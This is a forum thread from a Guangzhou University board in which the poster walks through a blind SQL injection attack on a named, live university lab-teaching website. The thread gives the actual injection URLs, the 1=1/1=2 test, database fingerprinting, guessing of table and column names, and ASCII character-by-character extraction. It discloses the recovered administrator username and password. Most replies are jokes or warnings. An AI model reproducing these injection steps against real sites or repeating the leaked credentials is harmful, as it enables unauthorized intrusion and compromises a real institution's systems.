广州大学论坛广大论坛 → 【技术水】一步步教你黑掉广大的实验教学中心网站
查看完整版本:【技术水】一步步教你黑掉广大的实验教学中心网站
2008/12/11 10:10:13





2008/12/11 19:34:21

2L祭广大



2008/12/12 9:36:54



今早是想黑红旗学生会的网站的,但是其功能太少,根本无从下手( ̄ε ̄*)
然后我就去2014年红旗学生会的网站看了下,留言板是前台验证,可以用XSS跨站脚本攻击,无奈,那个网站以及被他们废弃了,连数据库都关掉了……
今天学院老师给了我一个网站,叫我把我做的平台放上去,可是并没有给我账号和密码(他自己忘了)。
然后我自己今晚就上去看了一下
恩,是别人08年做的平台,恩,很不错、 可以作为练手的材料
下面我就交大家一步步的黑掉广大的这个网站



2008/12/12 20:24:29




这是个好东西,然后随便找了个帖子点了进去




2008/12/13 12:34:35

首先发个回帖,尝试下XXS跨站脚本攻击,发现没用。。


然后检测下看看有没有SQL注入漏洞,这种链接如http://www.xxx.com/xxx.asp?id=YY
的几年前的asp网站,基本上都有这种漏洞。


采用单引号法:

在浏览器地址栏中的页面链接地址后面增加一个单引号,刷新

  然后访问该链接地址,浏览器可能会返回类似于下面的错误提示信息:
MicrosoftJET Database Engine 错误’80040e14’
  字符串的语法错误在查询表达式’ID=YY’中。
/xxx.asp 行XX


这样就说明了该网站可能存在SQL注入攻击的漏洞。



2008/12/14 3:38:26

第一步,链接后加 and 1 = 1,刷新,






发现页面没有变化、



2008/12/14 19:32:01

第二步,链接后加 and 1 = 2,刷新,





出错提示,提示的是帖子找不到。即提示BOF或EOF(程序没做任何判断时)、或提示找不到记录(判断了rs.eof时)、或显示内容为空(程序加了on error resumenext)

恩,所以它就是可以注入的。



2008/12/15 6:53:20

下面总结一下这个方法:
① http://jyjssfzx.gzhu.edu.cn/bbs/topic.asp?l_id=11&t_id=11
② http://jyjssfzx.gzhu.edu.cn/bbs/topic.asp?l_id=11&t_id=11and 1=1
③ http://jyjssfzx.gzhu.edu.cn/bbs/topic.asp?l_id=11&t_id=11and 1=2


这就是经典的1=1、1=2测试法了,怎么判断呢?看看上面三个网址返回的结果就知道了:
可以注入的表现:
① 正常显示(这是必然的,不然就是程序有错误了)
② 正常显示,内容基本与①相同
③ 提示BOF或EOF(程序没做任何判断时)、或提示找不到记录(判断了rs.eof时)、或显示内容为空(程序加了on error resume next)
不可以注入就比较容易判断了,①同样正常显示,②和③一般都会有程序定义的错误提示,或提示类型转换时出错。



2008/12/16 0:30:45

下面,我们再来判断一下数据库:
ASP的数据库基本上(99%)都是SQLServer或者Access,所以我们只要判断出它是哪一种就可以了

在确认可以注入的情况下,使用下面的语句:
http://jyjssfzx.gzhu.edu.cn/bbs/topic.asp?l_id=11&t_id=11 and (select count(*) from sysobjects)>0
http://jyjssfzx.gzhu.edu.cn/bbs/topic.asp?l_id=11&t_id=11 and (select count(*) from msysobjects)>0

如果数据库是SQLServer,那么第一个网址的页面与原页面http://www.mytest.com/showdetail.asp?id= 49是大致相同的;而第二个网址,由于找不到表msysobjects,会提示出错,就算程序有容错处理,页面也与原页面完全不同。

如果数据库用的是Access,那么情况就有所不同,第一个网址的页面与原页面完全不同;第二个网址,则视乎数据库设置是否允许读该系统表,一般来说是不允许的,所以与原网址也是完全不同。大多数情况下,用第一个网址就可以得知系统所用的数据库类型,第二个网址只作为开启IIS错误提示时的验证。


但是我们根本不需要用这种方法,在最初链接加引号的时候,我们已经知道它是Access数据库了


至此,判断SQL注入点已经结束。此论坛的确存在SQL注入点,数据库为Access




2008/12/16 16:44:50

下面,我们就开始进行SQL注入。

根据注入参数类型,在脑海中重构SQL语句的原貌,按参数类型主要分为下面三种:
(!!!!!重要,这个是总结出来的经验)
(A) ID=11 这类注入的参数是数字型,SQL语句原貌大致如下:
Select * from 表名 where 字段=11
注入的参数为ID=11 And [查询条件],即是生成语句:
Select * from 表名 where 字段=11 And [查询条件]

(B) Class=连续剧这类注入的参数是字符型,SQL语句原貌大致概如下:
Select * from 表名 where 字段=’连续剧’
注入的参数为Class=连续剧’ and [查询条件] and ‘’=’ ,即是生成语句:
Select * from 表名 where 字段=’连续剧’ and [查询条件] and ‘’=’’

搜索时没过滤参数的,如keyword=关键字,SQL语句原貌大致如下:
Select * from 表名 where 字段like ’%关键字%’
注入的参数为keyword=’ and [查询条件] and ‘%25’=’,即是生成语句:
Select * from 表名 where字段like ’%’ and [查询条件] and ‘%’=’%’



2008/12/17 4:36:01

接着,将查询条件替换成SQL语句,猜解表名,例如:
ID=11 And (SelectCount(*) from Admin)>=0



运气真好,



如果页面就与ID=11的相同,说明附加条件成立,即表Admin存在,反之,即不存在(请牢记这种方法)。如此循环,直至猜到表名为止。



2008/12/17 22:33:57

如果页面就与ID=11的相同,说明附加条件成立,即表Admin存在,反之,即不存在(请牢记这种方法)。如此循环,直至猜到表名为止。

上图结果,就说明admin是存在的。表名猜出来后,将Count(*)替换成Count(字段名),用同样的原理猜解字段名。
先猜一下username





说明username字段不存在



2008/12/18 11:07:16

再猜admin,





Admin表有字段admin。
同理,重复以上步骤,还猜出了有password。

最后,在表名和列名猜解成功后,再使用SQL语句,得出字段的值,下面介绍一种最常用的方法-Ascii逐字解码法,虽然这种方法速度很慢,但肯定是可行的方法。



2008/12/19 7:43:57

我们举个例子,已知表Admin中存在admin字段,首先,我们取第一条记录,测试长度:
http://jyjssfzx.gzhu.edu.cn/bbs/topic.asp?l_id=11&t_id=11and (select top 1 len(admin) from Admin)>0
先说明原理,如果top 1的admin长度大于0,则条件成立;接着就是>1、>2、>3这样测试下去,一直到条件不成立为止,然后我继续测>3成立,>4不成立,就是len(admin)=4
下图就是>4时的界面,0~3都是正常显示,我就不截图了。





2008/12/19 21:38:50

当然没人会笨得从0,1,2,3一个个测试,怎么样才比较快就看各自发挥了。
知道了长度后就可以开始猜解了
And (Select top 1 asc(mid(admin,n,1)) from admin)>100
n就是猜解的表名的第几位,最后的长度数字就是刚才猜解出来的列名长度了,And(Select top 1 asc(mid(admin,1,1)) from admin)>100 就是猜解user里内容的第一位的ASCII字符是不是大于100
正确的话,那么表示USER第一个字符的ASCII码大于100,那么就猜>120,返回错误就是介于100-120之间,然后再一步一步的缩少,最终得到正确字符XXX,然后用ASCII转换器吧这个转换成普通字符就可以了
然后就是第二位 And (Select top 1 asc(mid(admin,2,1)) from admin)>100 一直猜下去。
然后我就一步步测,测出来第一位106,第二位97,第三位110,第四位101,转换成英文就是jane……
以上步骤再来一次,测得密码:123




2008/12/20 13:27:18

综上,我们知道了,这个网站用的是Access数据库,然后数据库里面有个admin表,其表有两个字段,admin和password,其第一条记录是 jane,123。也就是说管理员账号是jane,密码123。
至此,管理员账号密码权限获取成功,你想做什么就是你的事情了。
比如说





2008/12/21 3:46:31

结贴!直播居然都没人来看,伤心



2008/12/21 11:14:29

真的行吗?碉堡了!



2008/12/22 4:06:47





2008/12/22 21:04:43

去年学校的计算机测试系统就被黑了,不知道现在有没有修复



2008/12/23 13:42:55

截屏 大神啊



2008/12/24 8:29:52

是谁写下了史家之绝唱,无韵之离骚?
答案:司马迁,是太监!是阉党!
是谁改良了造纸术,传承了人类文明?
答案:蔡伦,是太监!是阉党!
是谁拓边西北,经略幽燕?
答案:童贯,是太监,是阉党!
是谁,扬帆远航,扬国威于万里之外?
答案:郑和,是太监!是阉党!
是谁只手遮天,压制祸国殃民的东林党
答案:魏忠贤,是太监!是阉党!
是谁发此贴子骗我们回复的?
答案:是楼主,………   



 敌进我退,敌驻我扰,敌疲我打,敌退我追



2008/12/24 20:05:45

坐等查水表



2008/12/25 9:41:38

路过围观



2008/12/25 23:37:18

又作死了你



2008/12/26 15:25:46

这位同学,你的思想很危险



2008/12/27 7:41:00

惊呆了



2008/12/28 1:34:21

然而对于我来说并没有什么卵用


Powered by UNCUID V2.2 © 2019-2025
Processed in 00.32 second(s)